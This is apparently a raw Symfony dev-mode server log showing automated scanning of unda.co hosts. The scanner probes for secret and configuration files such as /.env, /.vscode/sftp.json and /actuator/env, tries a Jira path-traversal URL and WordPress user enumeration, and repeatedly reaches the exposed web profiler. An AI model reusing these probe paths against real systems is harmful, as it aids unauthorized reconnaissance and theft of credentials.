  3732. [2025-12-18 09:13:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3733. [2025-12-18 09:13:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3734. [2025-12-18 09:13:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3735. [2025-12-18 09:13:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3736. [2025-12-18 09:13:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3737. [2025-12-18 09:13:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3738. [2025-12-18 09:13:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3739. [2025-12-18 09:13:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3740. [2025-12-18 09:13:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3741. [2025-12-18 09:13:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3742. [2025-12-18 09:13:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3743. [2025-12-18 09:13:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3744. [2025-12-18 09:13:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3745. [2025-12-18 09:13:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3746. [2025-12-18 09:13:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3747. [2025-12-18 09:13:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3748. [2025-12-18 09:13:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3749. [2025-12-18 09:13:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3750. [2025-12-18 09:13:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3751. [2025-12-18 09:13:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3752. [2025-12-18 09:13:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3753. [2025-12-18 09:13:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3754. [2025-12-18 09:14:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3755. [2025-12-18 09:14:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3756. [2025-12-18 09:14:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3757. [2025-12-18 09:14:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3758. [2025-12-18 09:14:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3759. [2025-12-18 09:14:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3760. [2025-12-18 09:14:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3761. [2025-12-18 09:14:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3762. [2025-12-18 09:14:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3763. [2025-12-18 09:14:13] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  3764. [2025-12-18 09:14:13] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  3765. [2025-12-18 09:14:13] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  3766. [2025-12-18 09:14:13] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  3767. [2025-12-18 09:14:13] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  3768. [2025-12-18 09:14:13] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  3769. [2025-12-18 09:14:13] security.DEBUG: Calling Authentication entry point. [] []
  3770. [2025-12-18 09:29:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3771. [2025-12-18 09:39:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0b323","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a0b323?panel=twig","method":"GET"} []
  3772. [2025-12-18 09:39:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  3773. [2025-12-18 09:41:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=form","method":"GET"} []
  3774. [2025-12-18 09:41:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  3775. [2025-12-18 09:47:40] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"42d0c1","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/42d0c1/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  3776. [2025-12-18 09:47:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  3777. [2025-12-18 09:50:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/gateway/routes"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/gateway/routes\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3778. [2025-12-18 09:50:59] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"092da8","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/092da8/search/results?limit=10&method=GET","method":"GET"} []
  3779. [2025-12-18 09:50:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  3780. [2025-12-18 09:52:44] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  3781. [2025-12-18 09:53:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c5960","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c5960?panel=time","method":"GET"} []
  3782. [2025-12-18 09:53:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  3783. [2025-12-18 10:02:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=109.199.118.129&limit=10","method":"GET"} []
  3784. [2025-12-18 10:02:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=109.199.118.129&limit=10","method":"GET"} []
  3785. [2025-12-18 10:06:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d01650","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d01650?panel=logger","method":"GET"} []
  3786. [2025-12-18 10:06:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  3787. [2025-12-18 10:12:32] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  3788. [2025-12-18 10:29:11] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FSecurity%2FCore%2FAuthorization%2FVoter%2FExpressionVoter.php&line=27","method":"GET"} []
  3789. [2025-12-18 10:31:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3790. [2025-12-18 10:37:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fa8c04","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fa8c04?panel=exception","method":"GET"} []
  3791. [2025-12-18 10:37:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  3792. [2025-12-18 10:50:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"711f96","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/711f96?panel=form","method":"GET"} []
